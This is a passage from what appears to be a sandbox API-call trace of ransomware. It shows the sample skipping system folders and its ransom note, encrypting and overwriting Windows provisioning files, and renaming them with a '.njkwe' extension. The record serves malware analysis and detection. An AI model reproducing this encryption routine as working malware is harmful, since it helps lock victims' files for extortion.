dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.467] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f8b671, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f8b671, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f8b671, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x287, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="427__Connections_Cellular_Sunrise (Switzerland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="427__C~1.PRO")) returned 1 [0079.467] lstrcmpiW (lpString1="427__Connections_Cellular_Sunrise (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.467] lstrcmpiW (lpString1="427__Connections_Cellular_Sunrise (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.467] lstrcmpiW (lpString1="427__Connections_Cellular_Sunrise (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.467] lstrcmpiW (lpString1="427__Connections_Cellular_Sunrise (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.467] lstrcmpiW (lpString1="427__Connections_Cellular_Sunrise (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.467] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\427__Connections_Cellular_Sunrise (Switzerland)_i0$(__MVID)@WAP.provxml") returned 165 [0079.467] StrStrIW (lpFirst="427__Connections_Cellular_Sunrise (Switzerland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.467] lstrcmpW (lpString1="427__Connections_Cellular_Sunrise (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.467] lstrcmpW (lpString1="427__Connections_Cellular_Sunrise (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.467] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\427__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.467] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\427__Connections_Cellular_Sunrise (Switzerland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\427__connections_cellular_sunrise (switzerland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.467] GetTickCount () returned 0x1154301 [0079.467] GetTickCount () returned 0x1154301 [0079.467] GetTickCount () returned 0x1154301 [0079.467] GetTickCount () returned 0x1154301 [0079.468] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.468] GetProcessHeap () returned 0xbe0000 [0079.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.468] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x287, lpOverlapped=0x0) returned 1 [0079.469] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd79, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.469] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x287, lpOverlapped=0x0) returned 1 [0079.469] GetProcessHeap () returned 0xbe0000 [0079.469] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.469] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.469] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.469] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.470] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.470] CloseHandle (hObject=0x43c) returned 1 [0079.470] GetProcessHeap () returned 0xbe0000 [0079.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.470] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\427__Connections_Cellular_Sunrise (Switzerland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0079.470] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\427__Connections_Cellular_Sunrise (Switzerland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\427__connections_cellular_sunrise (switzerland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\427__Connections_Cellular_Sunrise (Switzerland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\427__connections_cellular_sunrise (switzerland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.470] GetProcessHeap () returned 0xbe0000 [0079.470] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.470] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f8b671, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f8b671, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f8b671, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="428__Connections_Cellular_Swisscom (Switzerland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="428__C~1.PRO")) returned 1 [0079.471] lstrcmpiW (lpString1="428__Connections_Cellular_Swisscom (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.471] lstrcmpiW (lpString1="428__Connections_Cellular_Swisscom (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.471] lstrcmpiW (lpString1="428__Connections_Cellular_Swisscom (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.471] lstrcmpiW (lpString1="428__Connections_Cellular_Swisscom (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.471] lstrcmpiW (lpString1="428__Connections_Cellular_Swisscom (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.471] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\428__Connections_Cellular_Swisscom (Switzerland)_i0$(__MVID)@WAP.provxml") returned 166 [0079.471] StrStrIW (lpFirst="428__Connections_Cellular_Swisscom (Switzerland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.471] lstrcmpW (lpString1="428__Connections_Cellular_Swisscom (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.471] lstrcmpW (lpString1="428__Connections_Cellular_Swisscom (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.471] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\428__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.471] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\428__Connections_Cellular_Swisscom (Switzerland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\428__connections_cellular_swisscom (switzerland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.471] GetTickCount () returned 0x1154301 [0079.471] GetTickCount () returned 0x1154301 [0079.471] GetTickCount () returned 0x1154301 [0079.471] GetTickCount () returned 0x1154301 [0079.471] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.471] GetProcessHeap () returned 0xbe0000 [0079.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.471] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0079.484] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.485] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0079.485] GetProcessHeap () returned 0xbe0000 [0079.485] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.485] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.485] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.485] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.485] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.485] CloseHandle (hObject=0x43c) returned 1 [0079.485] GetProcessHeap () returned 0xbe0000 [0079.485] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.485] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\428__Connections_Cellular_Swisscom (Switzerland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0079.485] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\428__Connections_Cellular_Swisscom (Switzerland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\428__connections_cellular_swisscom (switzerland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\428__Connections_Cellular_Swisscom (Switzerland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\428__connections_cellular_swisscom (switzerland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.486] GetProcessHeap () returned 0xbe0000 [0079.486] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.486] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f8b671, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f8b671, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f8b671, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="429__Connections_Cellular_Tele2 (Switzerland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="429__C~1.PRO")) returned 1 [0079.486] lstrcmpiW (lpString1="429__Connections_Cellular_Tele2 (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.486] lstrcmpiW (lpString1="429__Connections_Cellular_Tele2 (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.486] lstrcmpiW (lpString1="429__Connections_Cellular_Tele2 (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.486] lstrcmpiW (lpString1="429__Connections_Cellular_Tele2 (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.486] lstrcmpiW (lpString1="429__Connections_Cellular_Tele2 (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.486] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\429__Connections_Cellular_Tele2 (Switzerland)_i0$(__MVID)@WAP.provxml") returned 163 [0079.486] StrStrIW (lpFirst="429__Connections_Cellular_Tele2 (Switzerland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.486] lstrcmpW (lpString1="429__Connections_Cellular_Tele2 (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.486] lstrcmpW (lpString1="429__Connections_Cellular_Tele2 (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.486] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\429__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.486] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\429__Connections_Cellular_Tele2 (Switzerland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\429__connections_cellular_tele2 (switzerland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.487] GetTickCount () returned 0x1154310 [0079.487] GetTickCount () returned 0x1154310 [0079.487] GetTickCount () returned 0x1154310 [0079.487] GetTickCount () returned 0x1154310 [0079.487] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.487] GetProcessHeap () returned 0xbe0000 [0079.487] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.487] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0079.488] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.488] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0079.489] GetProcessHeap () returned 0xbe0000 [0079.489] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.489] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.489] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.489] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.489] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.489] CloseHandle (hObject=0x43c) returned 1 [0079.489] GetProcessHeap () returned 0xbe0000 [0079.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.489] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\429__Connections_Cellular_Tele2 (Switzerland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0079.489] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\429__Connections_Cellular_Tele2 (Switzerland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\429__connections_cellular_tele2 (switzerland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\429__Connections_Cellular_Tele2 (Switzerland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\429__connections_cellular_tele2 (switzerland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.490] GetProcessHeap () returned 0xbe0000 [0079.490] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.490] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90247f0e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90247f0e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90247f0e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="42__Connections_Cellular_VELCOM (Belarus)_i3$(__MVID)@WAP.provxml", cAlternateFileName="42__CO~1.PRO")) returned 1 [0079.490] lstrcmpiW (lpString1="42__Connections_Cellular_VELCOM (Belarus)_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.490] lstrcmpiW (lpString1="42__Connections_Cellular_VELCOM (Belarus)_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.490] lstrcmpiW (lpString1="42__Connections_Cellular_VELCOM (Belarus)_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.490] lstrcmpiW (lpString1="42__Connections_Cellular_VELCOM (Belarus)_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.490] lstrcmpiW (lpString1="42__Connections_Cellular_VELCOM (Belarus)_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.490] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\42__Connections_Cellular_VELCOM (Belarus)_i3$(__MVID)@WAP.provxml") returned 159 [0079.490] StrStrIW (lpFirst="42__Connections_Cellular_VELCOM (Belarus)_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.490] lstrcmpW (lpString1="42__Connections_Cellular_VELCOM (Belarus)_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.490] lstrcmpW (lpString1="42__Connections_Cellular_VELCOM (Belarus)_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.490] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\42__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.490] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\42__Connections_Cellular_VELCOM (Belarus)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\42__connections_cellular_velcom (belarus)_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.491] GetTickCount () returned 0x1154310 [0079.491] GetTickCount () returned 0x1154310 [0079.491] GetTickCount () returned 0x1154310 [0079.491] GetTickCount () returned 0x1154310 [0079.491] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.491] GetProcessHeap () returned 0xbe0000 [0079.491] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.491] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x352, lpOverlapped=0x0) returned 1 [0079.492] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.492] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x352, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x352, lpOverlapped=0x0) returned 1 [0079.492] GetProcessHeap () returned 0xbe0000 [0079.492] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.492] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.492] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.492] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.493] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.493] CloseHandle (hObject=0x43c) returned 1 [0079.493] GetProcessHeap () returned 0xbe0000 [0079.493] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 